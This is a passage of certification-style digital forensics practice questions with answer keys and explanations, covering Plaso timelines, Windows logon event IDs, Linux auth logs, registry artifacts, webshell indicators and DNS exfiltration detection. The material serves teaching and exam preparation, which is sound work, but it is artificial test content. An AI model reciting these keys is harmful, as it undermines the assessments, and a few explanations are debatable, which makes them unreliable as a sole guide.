A.Plaso
B.Autopsy
C.Volatility
D.Sleuth Kit
AnswerA

Plaso (formerly log2timeline) is an open-source Python framework purpose-built for super timeline generation. It parses dozens of artifact types—file system metadata (MACB timestamps), log files, registry hives, browser history, and more—and outputs unified timelines in formats like SQLite, CSV, or Elasticsearch. It is the tool most directly associated with 'outputs a timeline of file system events' because it aggregates evidence from multiple sources into a single chronological narrative.

Why this answer

Plaso (log2timeline) is specifically designed to create super timelines by aggregating and correlating events from multiple sources, including file system metadata, registry hives, and event logs. It parses artifacts like NTFS $MFT, USN journal, and registry keys (e.g., NTUSER.DAT) to produce a unified timeline, enabling the analyst to correlate registry modifications with file creation times.

Exam trap

EC-Council often tests the distinction between tools that perform low-level file system analysis (Sleuth Kit) and those that aggregate multiple artifact sources into a unified timeline (Plaso), leading candidates to confuse Sleuth Kit's 'fls' output with a super timeline.

How to eliminate wrong answers

Option B (Autopsy) is wrong because it is a GUI-based digital forensics platform that relies on The Sleuth Kit for analysis and does not natively generate super timelines from multiple sources; it focuses on file carving and keyword search rather than timeline correlation. Option C (Volatility) is wrong because it is a memory forensics framework designed to analyze RAM dumps (e.g., processes, network connections) and does not parse file system or registry artifacts for timeline creation. Option D (Sleuth Kit) is wrong because it is a command-line toolkit for low-level file system analysis (e.g., mmls, fls) but lacks the multi-source aggregation and timeline synthesis capabilities of Plaso.

47
MCQmedium

A network analyst is reviewing a packet capture and sees a large number of TCP SYN packets sent to various ports on a single host from multiple source IPs. This pattern is most indicative of which type of attack?

A.ARP spoofing
B.SYN flood
C.DNS amplification
D.Ping of death
AnswerB

A SYN flood is a transport-layer denial-of-service attack that exploits the TCP three-way handshake by sending a massive number of SYN packets with spoofed or non-responsive source IP addresses. The server allocates a transmission control block (TCB) and memory for each half-open connection, then replies with SYN-ACK packets that are never answered, causing the listen backlog to fill and preventing legitimate clients from completing handshakes. This matches the capture of many SYN packets and represents a direct, stateful DoS mechanism.

Why this answer

A SYN flood attack exploits the TCP three-way handshake by sending a high volume of SYN packets with spoofed source IPs to a target host. The target allocates resources for each half-open connection, exhausting its backlog queue and preventing legitimate connections. The pattern of many SYN packets from multiple IPs to various ports matches this attack's signature.

Exam trap

EC-Council often tests the distinction between a SYN flood (which uses TCP SYN packets to exhaust connection resources) and a DDoS reflection attack like DNS amplification, where candidates mistakenly focus on the 'multiple source IPs' aspect without recognizing the TCP handshake exploitation.

How to eliminate wrong answers

Option A is wrong because ARP spoofing involves sending forged ARP replies to associate the attacker's MAC address with a legitimate IP, not a flood of TCP SYN packets from multiple sources. Option C is wrong because a DNS amplification attack uses small DNS queries with spoofed source IPs to cause large responses directed at the victim, relying on UDP and reflection, not TCP SYN floods. Option D is wrong because the Ping of Death involves sending oversized ICMP packets that cause buffer overflows, not a high volume of TCP SYN packets.

48
Multi-Selectmedium

Which THREE of the following are Windows Event IDs that are particularly useful for investigating account logon activities?

Select 3 answers
A.4625 - An account failed to log on
B.4648 - A logon was attempted using explicit credentials
C.4624 - An account was successfully logged on
D.4656 - A handle to an object was requested
E.7045 - A service was installed in the system
AnswersA, B, C

Event ID 4625 is generated on the domain controller or local machine whenever a logon attempt fails, regardless of whether the failure was due to a bad password, a nonexistent account, or a locked-out account. The event contains critical forensic details such as the account name, the source network address, logon type, and the specific sub-status code (e.g., 0xC000006A for bad password). Analysts rely on 4625 spikes to detect password spraying or brute-force attacks, and correlating this ID with successful logons (4624) for the same account shortly afterward can reveal successful credential compromise after repeated failures.

Why this answer

Option A (4625 - An account failed to log on) is correct because it records failed authentication attempts in the Security log, which is essential for detecting brute-force, password-spraying, or unauthorized access attempts. Option B (4648 - A logon was attempted using explicit credentials) is correct because it captures scenarios where a process or user supplies alternate credentials (e.g., RunAs, scheduled tasks, or lateral movement with explicit creds), which is critical for tracing credential misuse. Option C (4624 - An account was successfully logged on) is correct because it documents successful logons, including logon type (2 interactive, 3 network, 10 RDP, etc.), enabling investigators to establish a timeline of legitimate or suspicious access.

Option D (4656 - A handle to an object was requested) is not a logon event; it relates to object access auditing and handle requests, so it does not directly evidence account logon activity. Option E (7045 - A service was installed in the system) is a System log event about service installation (persistence), not an account logon event, so it is not relevant to investigating logon activities.

Exam trap

EC-Council often tests the distinction between logon-specific events (4624, 4625, 4648) and other security events like object access (4656) or system changes (7045), so candidates must remember that only events in the 462x series directly track account logon attempts.

49
Multi-Selectmedium

Which TWO of the following are valid artifacts for determining program execution on a Windows system? (Select TWO.)

Select 2 answers
A.Pagefile.sys
B.System Restore points
C.Jump Lists
D.Prefetch files
E.Windows Error Reporting logs
AnswersC, D

Jump Lists record recently and frequently accessed files and applications per user, including entries created when programs launch. They therefore evidence program execution on Windows, satisfying the requirement for a valid execution artifact alongside Prefetch and similar records.

Why this answer

Jump Lists (C) are valid artifacts because they are stored per-user in the AutomaticDestinations and CustomDestinations folders under %AppData%\Microsoft\Windows\Recent, and they record recently or frequently accessed files and applications, providing direct evidence of program execution. Prefetch files (D) are also valid because Windows creates a .pf file in C:\Windows\Prefetch for each executed application, containing the executable name, run count, and last-run timestamps, which directly demonstrates program execution. Pagefile.sys (A) is a virtual memory swap file, not an execution artifact, and System Restore points (B) are snapshots of system state used for rollback rather than proof of program execution.

Windows Error Reporting logs (E) record crash and error telemetry, so they may indicate a program ran but are not a reliable or standard artifact for determining execution.

Exam trap

EC-Council often tests the distinction between artifacts that record normal execution (Prefetch, Jump Lists) versus those that capture system state or errors (Pagefile, Restore Points, WER logs), leading candidates to overestimate the forensic value of Pagefile.sys or System Restore points.

50
MCQeasy

A security analyst reviews Windows Event Logs and sees Event ID 4625 multiple times for a single user account from a remote IP address within a short time frame. What is the MOST likely interpretation?

A.The user successfully logged on from multiple locations
B.An attacker is attempting to brute-force the user's password
C.The system is experiencing a denial-of-service attack
D.A service installed itself on the system
AnswerB

An attacker is attempting to brute-force the user's password is correct because a rapid series of Event ID 4625 entries from the same source IP against the same username is the classic signature of a brute-force or password-spraying attack. Each 4625 event includes metadata such as Logon Type (e.g., 3 for network or 10 for RDP), Sub Status codes (e.g., 0xC000006A for a bad password), and the source network address. The repeated failures followed by no corresponding 4624 success indicate the attacker has not yet guessed valid credentials, reinforcing the brute-force conclusion.

Why this answer

Event ID 4625 indicates a failed logon attempt. Multiple occurrences for the same user from a single remote IP within a short timeframe is the classic signature of a brute-force attack, where an attacker systematically tries different passwords against that account.

Exam trap

EC-Council often tests the distinction between success (4624) and failure (4625) event IDs, and the trap here is that candidates may misread 4625 as a successful logon or confuse it with a DoS attack because of the high frequency of events.

How to eliminate wrong answers

Option A is wrong because Event ID 4625 is a failure event, not a success; successful logons generate Event ID 4624. Option C is wrong because a denial-of-service attack would typically flood the system with traffic or cause resource exhaustion, not generate repeated failed logon attempts for a single user. Option D is wrong because a service installation would generate different event IDs (e.g., 4697 or 7045) and would not produce repeated 4625 failures from a remote IP.

51
MCQeasy

Which Linux log file is the primary source for authentication-related events, including SSH login attempts and sudo usage?

A./var/log/kern.log
B./var/log/syslog
C./var/log/auth.log
D./var/log/messages
AnswerC

This is the primary authentication log on Debian-based Linux distributions, recording events from the auth and authpriv syslog facilities. It captures successful and failed logins, sudo usage, SSH public-key and password authentication, user account changes, cron jobs run with authentication, and PAM module activity. As the central repository for authentication-related messages, forensic examiners look here first for evidence of unauthorized access or identity-related events.

Why this answer

/var/log/auth.log is the dedicated Linux log file for authentication-related events, including SSH login attempts (via PAM and sshd), sudo usage, and user authentication failures. This file is managed by the syslog daemon and is the primary source for forensic analysis of authentication activity on Debian-based systems.

Exam trap

The CHFI exam often tests the distinction between distribution-specific log files, so the trap here is that candidates familiar with Red Hat-based systems (where /var/log/secure is the auth log) may incorrectly choose /var/log/messages or /var/log/syslog, not realizing that CHFI focuses on Debian/Ubuntu conventions where /var/log/auth.log is the standard.

How to eliminate wrong answers

Option A is wrong because /var/log/kern.log records kernel messages, such as hardware errors and driver issues, not authentication events. Option B is wrong because /var/log/syslog captures general system logs (e.g., daemon messages, cron jobs) but does not specifically isolate authentication events; it may contain some auth entries only if the syslog configuration merges them, but it is not the primary source. Option D is wrong because /var/log/messages is a generic log file on some distributions (like Red Hat/CentOS) that stores non-critical system messages, but it is not the dedicated authentication log; on Debian systems, it often does not exist or is a symlink, and on RHEL-based systems, authentication events go to /var/log/secure, not /var/log/messages.

52
MCQmedium

During a forensic analysis of a compromised Linux server, you notice that the file /var/log/auth.log has been cleared. However, you find that the attacker's commands are still partially recoverable. Which artifact most likely contains the attacker's command history?

A./var/log/syslog
B.~/.bash_history
C./proc/1/cmdline
D./etc/shadow
AnswerB

~/.bash_history is the correct artifact because it is the per-user history file that bash appends with every command entered interactively. When a shell exits cleanly, the session's commands are written here, making it a direct record of user activity. Investigators commonly use it to reconstruct an attacker's command sequence, though it can be disabled or truncated.

Why this answer

The ~/.bash_history file stores the command history for individual user accounts, including commands executed by an attacker who gained shell access. Even if /var/log/auth.log is cleared, this file retains the attacker's command history unless explicitly deleted or truncated. This makes it a key artifact for recovering attacker activity.

Exam trap

The CHFI exam often tests the misconception that /var/log/syslog or /var/log/auth.log captures all user activity, but the trap here is that command history is user-specific and stored in the home directory's .bash_history file, not in system logs.

How to eliminate wrong answers

Option A is wrong because /var/log/syslog logs system messages and kernel events, not user command history; it typically does not capture individual shell commands. Option C is wrong because /proc/1/cmdline shows the command line arguments of the init process (PID 1), not the attacker's interactive shell commands. Option D is wrong because /etc/shadow stores hashed user passwords and password aging information, not command history.

53
MCQeasy

In Linux, which file contains hashed user passwords?

A./etc/gshadow
B./etc/group
C./etc/passwd
D./etc/shadow
AnswerD

/etc/shadow is the authoritative shadow password database that contains each user's hashed password and related aging metadata. It is typically readable only by root and the shadow group (mode 640 root:shadow) precisely because it holds credential verifiers. Fields include login name, password hash (often with $id$salt$hash format), last change, minimum/maximum age, warning, inactivity, and expiration. Thus the answer to the question is /etc/shadow.

Why this answer

The /etc/shadow file stores hashed user passwords along with password aging information, and is readable only by root to enhance security. In contrast, /etc/passwd contains user account information but stores only a placeholder (usually 'x' or '*') for the password hash, not the hash itself. This separation is a standard Linux security mechanism to prevent unauthorized access to password hashes.

Exam trap

EC-Council often tests the misconception that /etc/passwd still contains password hashes, leading candidates to choose option C, but modern Linux systems have moved hashes to /etc/shadow for security.

How to eliminate wrong answers

Option A is wrong because /etc/gshadow stores hashed group passwords and group administrator information, not user passwords. Option B is wrong because /etc/group defines group memberships and optionally group passwords (often stored as 'x' with hashes in /etc/gshadow), not user password hashes. Option C is wrong because /etc/passwd historically stored password hashes, but modern Linux systems use shadow passwords, and /etc/passwd now contains only a placeholder (e.g., 'x') indicating the hash is in /etc/shadow.

54
MCQhard

A network forensic analyst examines a pcap file in Wireshark and sees an HTTP POST request to '/shell.jsp' with a parameter 'cmd' containing 'dir'. The response contains a directory listing. Which intrusion artifact is indicated?

A.SQL injection
B.Directory traversal
C.Webshell
D.Cross-site scripting (XSS)
AnswerC

A webshell is a server-side script (e.g., PHP or ASP) that accepts HTTP parameters such as 'cmd' and passes them to system functions like shell_exec(), allowing remote attackers to run arbitrary operating system commands. The pcap's 'cmd' parameter accompanied by a directory listing is the classic fingerprint of a webshell: the attacker issues ls/dir and the response contains the filesystem enumeration. This combination of HTTP request structure with observable command output directly matches webshell behavior.

Why this answer

The HTTP POST request to '/shell.jsp' with a 'cmd' parameter containing 'dir' and a response showing a directory listing is a classic indicator of a webshell. A webshell is a malicious script (e.g., JSP, ASP, PHP) uploaded to a web server that allows an attacker to execute arbitrary system commands via HTTP requests, effectively providing remote command execution. The presence of a command parameter and the server's response executing that command directly confirms the artifact is a webshell.

Exam trap

The trap here is that candidates confuse the directory listing output with directory traversal (Option B), but directory traversal reads files via path manipulation, not by executing a command like 'dir' through a server-side script parameter.

How to eliminate wrong answers

Option A is wrong because SQL injection involves manipulating SQL queries through input fields (e.g., ' OR 1=1--), not executing system commands like 'dir' via an HTTP parameter. Option B is wrong because directory traversal exploits path manipulation (e.g., '../../etc/passwd') to read arbitrary files, not to execute commands or receive a directory listing as a command output. Option D is wrong because cross-site scripting (XSS) injects client-side scripts (e.g., JavaScript) into web pages viewed by other users, not server-side command execution via a POST parameter.

55
MCQhard

A forensic analyst is examining a Windows system and finds that the UserAssist key in the NTUSER.DAT hive contains entries with Rot13-encoded names. What is the primary purpose of the UserAssist key?

A.Record USB device connection history
B.Store user password history
C.Log program execution counts and last run times
D.Track recently opened documents via Jump Lists
AnswerC

UserAssist is a per-user registry key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count that records GUI applications launched through Windows Explorer. Each value contains the ROT13-obfuscated path of an executable, with an embedded binary payload representing the number of times it was executed and the last execution timestamp encoded as a FILETIME. Forensic analysts decrypt the ROT13 and parse the binary data to prove a specific program was run, how often, and when, which is exactly what this correct answer describes.

Why this answer

The UserAssist key in the NTUSER.DAT hive is designed to track program execution counts and the last time each program was run by the user. The Rot13 encoding of the subkey names is a lightweight obfuscation to hide the logged application paths, but the core purpose remains forensic artifact for user activity timeline reconstruction.

Exam trap

The trap here is that candidates confuse the Rot13 encoding as a security feature for hiding passwords or sensitive data, when in fact it is merely a weak obfuscation of program paths and has nothing to do with password storage or USB tracking.

How to eliminate wrong answers

Option A is wrong because USB device connection history is recorded in the SYSTEM hive (USBSTOR key) and the setupapi.dev.log, not in the UserAssist key. Option B is wrong because user password history is stored in the SAM hive (as LM/NT hashes) or in Active Directory, not in UserAssist. Option D is wrong because recently opened documents via Jump Lists are stored as *.automaticDestinations-ms files in the user's AppData\Roaming\Microsoft\Windows\Recent directory, not in the UserAssist registry key.

56
MCQeasy

Which tool is specifically designed for timeline analysis of forensic artifacts across multiple systems and can process output from various forensic tools?

A.Autopsy
B.Wireshark
C.Sleuth Kit
D.log2timeline
AnswerD

log2timeline, now part of the Plaso project, is specifically engineered to acquire and analyze timestamps from a wide array of artifact sources—file system metadata, Windows Registry, event logs, browser history, and third-party application logs—into a unified SQLite timeline database. Its dedicated tools such as pinfo and psort filter, sort, and output event timelines, making it the canonical purpose-built solution for timestamp correlation in digital forensics. Unlike generic analysis platforms or packet analyzers, its entire architecture is centered on timeline generation and analysis.

Why this answer

log2timeline (now part of the Plaso framework) is specifically designed for super timeline creation, aggregating and correlating timestamps from multiple forensic artifacts across different systems. It can ingest output from tools like The Sleuth Kit, Autopsy, and others to produce a unified, high-resolution timeline for analysis.

Exam trap

EC-Council often tests the distinction between a general forensic suite (like Autopsy or Sleuth Kit) and a specialized timeline analysis tool (log2timeline), leading candidates to choose a familiar tool that can perform some timeline functions but lacks the cross-tool aggregation capability.

How to eliminate wrong answers

Option A is wrong because Autopsy is a digital forensics platform that provides a GUI for analyzing disk images and file systems, but it is not specifically designed for cross-system timeline aggregation from multiple tools. Option B is wrong because Wireshark is a network protocol analyzer for capturing and inspecting live or recorded network traffic, not for timeline analysis of forensic artifacts. Option C is wrong because The Sleuth Kit is a collection of command-line tools for low-level file system and volume analysis, but it lacks the built-in capability to merge timestamps from diverse sources into a single super timeline.

57
Multi-Selectmedium

An investigator is analyzing a Windows system and wants to find evidence of USB device usage. Which TWO registry keys should be examined? (Select TWO.)

Select 2 answers
A.HKLM\SAM\SAM
B.HKCU\Software\Microsoft\Windows\CurrentVersion\Run
C.HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR
D.HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
E.HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
AnswersC, D

HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR is the definitive system-wide registry hive for USB mass storage devices. Each subkey corresponds to a unique device instance, following the pattern Disk&Ven_[vendor]&Prod_[product]&Rev_[revision], with a serial-number subkey that can identify the exact device. It also contains the ParentIdPrefix value, which can be correlated with other artifacts such as Setupapi.dev.log and MountPoints2 to establish connection timelines. This key is a primary source for listing all USB storage devices ever plugged into the system.

Why this answer

Option C, HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR, is correct because this key is where Windows records every USB mass-storage device that has ever been connected, storing device instance IDs, vendor/product identifiers, and serial numbers that directly evidence USB storage usage. Option D, HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2, is correct because it tracks per-user mount points and drive-letter assignments for mounted volumes, including USB drives, showing which user mounted which removable device. Option A, HKLM\SAM\SAM, is incorrect because the SAM hive stores local account and group security data, not USB device artifacts.

Option B, HKCU\Software\Microsoft\Windows\CurrentVersion\Run, is incorrect because it lists programs configured to auto-start at logon, which is persistence-related rather than USB-usage evidence. Option E, HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList, is incorrect because it maps user SIDs to profile paths, not USB device connections.

Exam trap

EC-Council often tests the distinction between system-wide device enumeration (USBSTOR) and user-specific mount point history (MountPoints2), leading candidates to mistakenly select startup or profile keys that have no connection to USB artifacts.

58
MCQeasy

Which Windows artifact is primarily used to determine the execution history of applications, including the path and run count?

A.LNK files
B.Jump lists
C.Prefetch files
D.Event logs
AnswerC

Prefetch files are generated by the Windows Prefetcher on each application launch to accelerate future startups by preloading referenced pages and DLLs. Each .pf file in C:\Windows\Prefetch contains the full executable path, a run count (stored at a specific offset in the header), the last execution timestamp, and a list of files accessed at startup. This makes Prefetch files the primary native artifact for determining the execution history, run count, and last run time of a specific application. They are especially powerful because they exist by default on desktop Windows installations, but forensic examiners should account for cases where Prefetch is disabled (e.g., on SSDs with certain configurations or via Group Policy).

Why this answer

Prefetch files (.pf) are created by Windows to speed up application startup by caching data about the files loaded during the first few seconds of execution. Each prefetch file records the application's path, the number of times it has been run (run count), and the last execution timestamp, making it the primary artifact for determining execution history.

Exam trap

EC-CHFI often tests the distinction between artifacts that track execution history (Prefetch) versus those that track file access or user activity (LNK files, Jump Lists), so candidates mistakenly choose LNK files because they associate shortcuts with program launches.

How to eliminate wrong answers

Option A is wrong because LNK files (shortcuts) store metadata about the target file's location and creation/modification times, but they do not track run count or execution history. Option B is wrong because Jump Lists store recently accessed files and tasks for an application pinned to the taskbar, but they do not record the number of times the application itself was executed. Option D is wrong because Event logs record system, security, and application events (e.g., process creation via Event ID 4688), but they are not the primary artifact for execution history and do not inherently track run count or prefetch-specific data.

59
Multi-Selecthard

A security analyst is investigating a potential webshell on an IIS server. Which THREE artifacts are commonly associated with webshell presence?

Select 3 answers
A.Increase in NetFlow traffic to a known good update server
B.Presence of encoded scripts in the web application directory
C.Event ID 4624 logon events from the service account
D.Unusual HTTP POST requests to .asp or .aspx files in IIS logs
E.Process creation events for cmd.exe or powershell.exe spawned by w3wp.exe
AnswersB, D, E

Because webshells must be accessible by the web server, they are nearly always planted in a web-accessible directory, such as wwwroot or a subfolder. Attackers routinely hide the malicious intent by encoding the payload—for instance with base64, hex, or gzinflate—so the file appears as an opaque script without readable function names. Legitimate web application code is rarely obfuscated in this manner, so the combination of placement in a web directory and encoded content is a strong, direct indicator of a webshell.

Why this answer

Option B is correct because webshells are typically dropped as script files (e.g., .asp, .aspx, .php) in web-accessible directories, and attackers frequently obfuscate or encode them (Base64, gzip, eval/execute blocks) to evade signature detection. Option D is correct because webshell interaction occurs over HTTP, so IIS logs commonly show anomalous POST requests to .asp/.aspx endpoints, often with unusual user agents, parameters, or response sizes indicating command execution. Option E is correct because IIS worker process w3wp.exe spawning cmd.exe or powershell.exe is a classic parent-child anomaly indicating remote command execution through a webshell.

Option A is not specific to webshells, since NetFlow to a legitimate update server is normal patching traffic and lacks host-level context. Option C is not indicative either, as Event ID 4624 logons by a service account are routine and do not by themselves evidence webshell activity.

Exam trap

Candidates often mistake Event ID 4624 logon events for webshell activity, but these are routine authentication events. The correct artifacts are unusual HTTP POST requests, encoded scripts, and child processes of w3wp.exe.

60
MCQmedium

An analyst detects a large amount of data being exfiltrated from a network over DNS queries. Which type of network analysis would BEST detect this activity?

A.Proxy log analysis
B.Firewall log analysis
C.Packet capture analysis
D.IDS/IPS log analysis
AnswerC

Packet capture analysis is the definitive method because it records the raw DNS datagrams, preserving every byte of the query name and answer section. An analyst using Wireshark, tcpdump, or NetworkMiner can inspect individual DNS QNAME labels for high entropy, long subdomains, or unusual RR types, then decode the embedded data. This also provides the original evidence needed for forensic reconstruction rather than relying on summary logs.

Why this answer

Packet capture analysis (C) is the best method because DNS exfiltration involves encoding stolen data into DNS query or response fields (e.g., subdomains, TXT records). Only full packet capture allows inspection of the raw DNS payloads, including the actual query names and response data, which is necessary to detect the anomalous patterns of data being tunneled over DNS. Proxy, firewall, and IDS/IPS logs typically only record metadata (source/destination, timestamps, allowed/denied actions) and do not provide the granularity to see the encoded data within DNS packets.

Exam trap

EC-Council often tests the misconception that IDS/IPS logs (D) are sufficient for detecting all types of network attacks, but in the case of DNS tunneling, the logs only show alerts for known signatures, not the raw payload data required to confirm exfiltration.

How to eliminate wrong answers

Option A is wrong because proxy logs record HTTP/HTTPS requests and responses, not raw DNS traffic; DNS exfiltration occurs at the network layer (UDP 53) and is not captured by a web proxy. Option B is wrong because firewall logs show allowed/denied connections and basic packet headers (IP, port, protocol) but do not decode or log the payload content of DNS queries, so the exfiltrated data hidden in DNS fields is invisible. Option D is wrong because IDS/IPS logs contain alerts based on signatures or anomalies, but many DNS exfiltration tools use legitimate-looking queries that evade signature-based detection; moreover, IDS logs only record triggered alerts, not the full packet data needed for analysis.

61
MCQmedium

A Linux investigator wants to see all commands run by a user from the bash shell. Which file should be examined?

A./etc/passwd
B./var/log/auth.log
C.~/.bash_history
D./var/log/syslog
AnswerC

~/.bash_history is the per-user history file for the Bash shell, normally loaded in an interactive session and appended to when the shell exits or when history -a is invoked. It directly contains the command lines typed by that user, making it the correct primary source for this investigation. Note that its presence can be disabled or limited by HISTFILE, HISTSIZE, and HISTFILESIZE, and commands may be missing if history was truncated or multiple shells were used.

Why this answer

The ~/.bash_history file stores the command history for each user's bash shell session. When a user runs commands in bash, they are appended to this file (typically in the user's home directory) unless history logging is disabled. Examining this file allows an investigator to see the exact commands executed by that specific user from the bash shell.

Exam trap

EC-Council often tests the distinction between authentication logs (auth.log) and user command history (.bash_history), so candidates may mistakenly choose /var/log/auth.log because it logs user activity, but it only records authentication events, not shell commands.

How to eliminate wrong answers

Option A is wrong because /etc/passwd contains user account information (usernames, UIDs, home directories, shells) but does not log command execution history. Option B is wrong because /var/log/auth.log records authentication-related events such as login attempts, sudo usage, and SSH connections, not the commands run after login. Option D is wrong because /var/log/syslog captures general system messages (kernel, daemon, and application logs) but does not store per-user bash command history.

62
Multi-Selectmedium

An analyst is reviewing firewall logs and sees repeated outbound connections from an internal host to a known malicious IP on port 443. Which TWO network forensic data sources would BEST help determine if data exfiltration occurred?

Select 2 answers
A.Network flow records showing packet sizes and counts
B.Full packet capture (PCAP) of the sessions
C.IDS alerts for signatures
D.Windows security event logs
E.Proxy logs with TLS interception and decrypted content
AnswersB, E

A full packet capture preserves the raw network frames, including the application-layer payload of every session. By reassembling the TCP streams, the analyst can reconstruct the exact data segments transmitted, such as uploaded files, commands, or stolen records. This makes PCAP the only log source that gives complete, packet-level proof of outbound data content, subject to encryption.

Why this answer

Option B (Full packet capture (PCAP) of the sessions) is correct because PCAP records the actual bytes of each TCP session on port 443, allowing an analyst to inspect payloads, TLS handshake metadata, certificate details, and transferred content to confirm whether sensitive data left the host. Option E (Proxy logs with TLS interception and decrypted content) is correct because a TLS-intercepting proxy terminates the outbound TLS connection, decrypts the HTTP/HTTPS traffic, and logs URLs, methods, request/response bodies, and uploaded data, which directly reveals exfiltration over 443. Option A is not among the marked correct answers: flow records only show metadata such as byte/packet counts and timing, which can suggest large transfers but cannot confirm exfiltration content.

Option C is not marked correct because IDS signature alerts indicate suspicious activity but do not by themselves prove that data was exfiltrated. Option D is not marked correct because Windows security event logs focus on host authentication, account, and policy events rather than the contents or destinations of outbound TLS sessions.

Exam trap

The trap here is that candidates often choose NetFlow records (A) thinking they can detect exfiltration by abnormal traffic patterns, but they overlook that without payload inspection, you cannot confirm data was actually stolen; only PCAP and decrypted proxy logs provide the necessary content-level evidence.

63
MCQeasy

Which Windows Registry hive contains user-specific configuration such as MRU lists and UserAssist artifacts?

A.NTUSER.DAT
B.HKLM\SAM
C.SYSTEM
D.HKLM\System
AnswerA

NTUSER.DAT is the per-user registry hive that Windows loads into HKEY_CURRENT_USER when a user logs on. It contains user-specific configuration such as desktop settings, environment variables, application preferences, and network drive mappings, stored in the user's profile directory. This makes it the only hive among the options that directly holds individual user settings.

Why this answer

The NTUSER.DAT file is the registry hive that stores per-user configuration settings, including MRU (Most Recently Used) lists and UserAssist artifacts. When a user logs into a Windows system, this hive is loaded into HKEY_CURRENT_USER (HKCU), making it the primary source for user-specific forensic artifacts such as executed program traces and file access history.

Exam trap

The EC-Council CHFI often tests the misconception that HKLM\System or SYSTEM contains user-specific data, but these hives are system-wide and do not store per-user artifacts like MRU lists or UserAssist entries.

How to eliminate wrong answers

Option B (HKLM\SAM) is wrong because it contains the Security Account Manager database with user account hashes and group memberships, not user-specific MRU lists or UserAssist artifacts. Option C (SYSTEM) is wrong because it is a system-level hive storing hardware configuration, device drivers, and system services, not per-user activity data. Option D (HKLM\System) is wrong because it is the same as the SYSTEM hive loaded under HKEY_LOCAL_MACHINE, which holds system-wide settings and boot configuration, not user-specific forensic artifacts like MRU or UserAssist.

64
MCQeasy

In Windows forensics, which artifact is used to track recently executed programs on a per-user basis?

A.Jump lists
B.UserAssist
C.ShellBags
D.Prefetch files
AnswerB

UserAssist is a registry key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist in NTUSER.DAT that logs each per-user program execution, recording a Run Counter and Last Execution Time. The subkeys are GUIDs representing specific application categories, and the values are ROT13 encoded in many Windows versions, which can be easily decoded by forensic tools. Because it is stored per-user in the user hive, it directly ties an executed binary to a specific user account, making it the primary artifact for investigating recently executed programs.

Why this answer

UserAssist is a Windows registry key (under NTUSER.DAT) that records the execution count and last execution time of GUI-based programs for each user. It is specifically designed to track recently executed programs on a per-user basis, making it the correct artifact for this forensic question.

Exam trap

The CHFI exam often tests the distinction between system-wide artifacts (Prefetch) and per-user artifacts (UserAssist), and the trap here is that candidates confuse Prefetch's global execution tracking with UserAssist's user-specific logging.

How to eliminate wrong answers

Option A is wrong because Jump Lists store recently accessed files and application-specific tasks, not a direct log of executed programs. Option C is wrong because ShellBags track folder view settings and window positions, not program execution history. Option D is wrong because Prefetch files track all program launches system-wide, not on a per-user basis, and are stored in C:\Windows\Prefetch.

65
MCQhard

A forensic analyst finds a suspicious .plist file in /Library/LaunchDaemons/ on a macOS system. The file contains a key "ProgramArguments" with a path to a script in /tmp. Which persistence mechanism does this indicate?

A.Cron job
B.Launch daemon
C.Login item
D.Kernel extension
AnswerB

A LaunchDaemon is defined by a plist placed in either /Library/LaunchDaemons/ (system-wide) or /System/Library/LaunchDaemons/ (Apple-sanctioned system services). These plists contain keys such as ProgramArguments, RunAtLoad, and KeepAlive, and launchd loads them during boot to execute services with root privileges, independent of any user session. A suspicious plist in the Library is therefore most consistent with a LaunchDaemon, especially if it resides in the LaunchDaemons subdirectory and lacks a user-specific component.

Why this answer

The .plist file located in /Library/LaunchDaemons/ with a 'ProgramArguments' key pointing to a script in /tmp is the standard configuration for a launch daemon. Launch daemons are system-wide background processes managed by launchd, and they are defined by plist files in /Library/LaunchDaemons/ (for system-wide daemons) or /System/Library/LaunchDaemons/ (for Apple-provided daemons). The presence of 'ProgramArguments' specifies the executable or script to run, making this a classic launch daemon persistence mechanism.

Exam trap

EC-Council often tests the distinction between launch daemons (system-wide, in /Library/LaunchDaemons/) and launch agents (per-user, in ~/Library/LaunchAgents/), and candidates may confuse the two or incorrectly associate .plist files with cron jobs or login items.

How to eliminate wrong answers

Option A is wrong because cron jobs are configured via crontab files (e.g., /etc/crontab or user crontabs) and do not use .plist files in /Library/LaunchDaemons/; cron is a legacy scheduler, not a launchd-based mechanism. Option C is wrong because login items are managed through System Preferences > Users & Groups or via the com.apple.loginitems.plist file in the user's Library/Preferences, not through a system-level plist in /Library/LaunchDaemons/. Option D is wrong because kernel extensions (.kext) are loaded into the kernel space and are installed in /System/Library/Extensions/ or /Library/Extensions/, not configured via plist files in /Library/LaunchDaemons/.

66
MCQmedium

A security analyst reviews firewall logs and sees repeated outbound connections from an internal server to an external IP on port 443. The server is not supposed to initiate outbound connections. Which action should the analyst take FIRST?

A.Block the external IP at the firewall
B.Ignore the traffic as it is encrypted
C.Disable the server's network connection
D.Investigate the server for signs of compromise
AnswerD

Investigating the server for signs of compromise is the appropriate first response to repeated connections, as it determines whether the external IP's activity has successfully exploited a vulnerability. This includes checking for unauthorized processes, anomalous registry entries, new user accounts, scheduled tasks, modified binaries, and indicators of compromise (IOCs) such as unusual outbound connections or file hashes. Establishing a baseline and correlating firewall logs with endpoint logs enables the analyst to identify the attack vector, scope, and appropriate remediation steps.

Why this answer

The server is exhibiting anomalous behavior by initiating outbound connections on port 443 (HTTPS) when it should not be doing so. This is a classic indicator of a potential compromise, such as a command-and-control (C2) callback or data exfiltration. The first priority is to investigate the server for signs of compromise to understand the scope and nature of the threat before taking any disruptive action.

Exam trap

The trap here is that candidates often choose to block the IP immediately (Option A) or disable the server (Option C) without first investigating, failing to recognize that the CHFI methodology prioritizes evidence preservation and root cause analysis over immediate containment.

How to eliminate wrong answers

Option A is wrong because blindly blocking the external IP at the firewall may disrupt legitimate traffic if the IP is shared or used by other services, and it does not address the root cause—the server may still be compromised and could use a different IP or port. Option B is wrong because encrypted traffic (TLS/SSL on port 443) can still be malicious; encryption does not imply safety, and the analyst must inspect the traffic using SSL interception or endpoint forensics. Option C is wrong because disabling the server's network connection is a reactive measure that could cause business disruption and destroy volatile evidence (e.g., active network connections, memory artifacts) needed for forensic analysis.

67
MCQhard

